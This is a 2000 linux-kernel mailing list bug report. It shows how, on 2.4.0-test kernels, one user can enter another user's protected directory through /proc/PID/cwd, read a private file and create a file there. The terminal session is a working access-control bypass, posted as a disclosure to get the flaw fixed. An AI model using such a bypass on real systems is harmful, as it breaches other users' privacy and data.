2.4.(0-test10): /proc security hole

Lutz Pressler Sun, 05 Nov 2000 04:54:02 -0800
Hello,

I do not think that the following behaviour (2.4.0-test10 on i386, also
tested with 2.4.0-test8) is intended: 

testuser@vax:~ > id
uid=503(testuser) gid=100(users) Gruppen=100(users)
testuser@vax:~ > ls -lad .
drwx------   7 testuser users        4096 Nov  5 13:38 .

testuser@vax:~ > cd dir
testuser@vax:~/dir > ls -la 
insgesamt 16
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 .
drwx------   7 testuser users        4096 Nov  5 13:38 ..
-rw-r--r--   1 testuser users           7 Nov  5 13:39 file
drwxrwxr-x   2 testuser users        4096 Nov  5 13:39 subdir


Myself (lpressl, uid=500) cannot change into /home/testuser/dir,
as expected:
lpressl@vax:~ > cd ~testuser/dir
bash: cd: /home/testuser/dir: Permission denied

BUT: let testuser be logged in and have a process (bash) with cwd
/home/testuser/dir. Then
lpressl@vax:~ > ps uax |grep testuser
yields
...
testuser   588  0.0  2.1  2256 1360 tty2     S    13:38   0:00 -bash
...

lpressl@vax:~ > cd /proc/588
lpressl@vax:/proc/588 > ls -la
total 0
dr-xr-xr-x   3 testuser users     0 Nov  5 13:49 .
dr-xr-xr-x  59 root     root      0 Nov  5 13:34 ..
-r--r--r--   1 testuser users     0 Nov  5 13:49 cmdline
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 cwd -> /home/testuser/dir
-r--------   1 testuser users     0 Nov  5 13:49 environ
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 exe -> /bin/bash
dr-x------   2 testuser users     0 Nov  5 13:49 fd
-r--r--r--   1 testuser users     0 Nov  5 13:49 maps
-rw-------   1 testuser users     0 Nov  5 13:49 mem
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 root -> /
-r--r--r--   1 testuser users     0 Nov  5 13:49 stat
-r--r--r--   1 testuser users     0 Nov  5 13:49 statm
-r--r--r--   1 testuser users     0 Nov  5 13:49 status

cd cwd shouldn't be possible, should it? But let's see:
lpressl@vax:/proc/588 > cd cwd
lpressl@vax:/proc/588/cwd > 

Oops....

lpressl@vax:/proc/588/cwd > ls -la
total 16
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 .
drwx------   7 testuser users        4096 Nov  5 13:38 ..
-rw-r--r--   1 testuser users           7 Nov  5 13:39 file
drwxrwxr-x   2 testuser users        4096 Nov  5 13:39 subdir

lpressl@vax:/proc/588/cwd > cat file
secret
lpressl@vax:/proc/588/cwd > cd subdir
lpressl@vax:/proc/588/cwd/subdir > 
lpressl@vax:/proc/588/cwd/subdir > echo ohoh > newfile
lpressl@vax:/proc/588/cwd/subdir > ls -la
total 12
drwxrwxr-x   2 testuser users        4096 Nov  5 13:53 .
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 ..
-rw-r--r--   1 lpressl  users           5 Nov  5 13:53 newfile


This is bad. 2.2 kernels don't show this behavior. There _any_
/proc/PID/cwd "directory" has no group or world permissions
at all.

I haven't looked at the code at all yet. Anybody with a fix?


Regards,
  Lutz
  


-- 
  _              |  Lutz Pressler          |  Tel: ++49-551-3700002
 |_     |\ |     |  Service Network GmbH   |  FAX: ++49-551-3700009
 ._|ER  | \|ET   |  Bahnhofsallee 1b       |   mailto:[EMAIL PROTECTED]
Service Network  |  D-37081 Goettingen     |  http://www.SerNet.DE/
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to [EMAIL PROTECTED]
Please read the FAQ at http://www.tux.org/lkml/
2.4.(0-test10): /proc security hole

Reply via email to
